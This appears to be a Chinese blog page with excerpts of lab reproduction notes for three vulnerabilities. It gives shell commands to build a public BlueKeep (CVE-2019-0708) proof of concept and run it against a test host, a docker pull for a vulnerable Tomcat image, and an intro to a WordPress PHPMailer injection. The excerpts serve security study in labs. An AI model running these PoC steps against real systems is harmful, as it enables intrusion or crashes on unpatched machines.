CVE-2019-0708

漏洞验证

复现环境:

攻击机:Kali Linux(Windows子系统)

目标主机:Windows 7 SP1 64位

准备环境|Poc下载/编译

1
2
3
4
5
6
7
8
9
sudo apt install dh-autoreconf
sudo apt install libssl-dev
sudo apt install libx11-dev
git clone https://github.com/zerosum0x0/CVE-2019-0708.git
cd CVE-2019-0708/rdesktop-fork-bd6aa6acddf0ba640a49834807872f4cc0d0a773/
./bootstrap
./configure --disable-credssp --disable-smartcard
make
./rdesktop 192.168.1.7:3389

Tomcat 远程代码执行漏洞 (CVE-2017-12615)

0x00

首先还是通过docker搭建实验环境 ,实验环境需要docker来挂载,docker安装教程:https://blog.csdn.net/levones/article/details/80474994

下载docker镜像:

1
docker pull medicean/vulapps:t_tomcat_1

WordPress小于等于4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验

0x00

此漏洞利用的是HTTP头部注入,参考资料:http://www.freebuf.com/articles/web/164817.html

首先放出实验来源:http://vulapps.evalbug.com/w_wordpress_6/

实验环境需要docker来挂载,docker安装教程:https://blog.csdn.net/levones/article/details/80474994

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×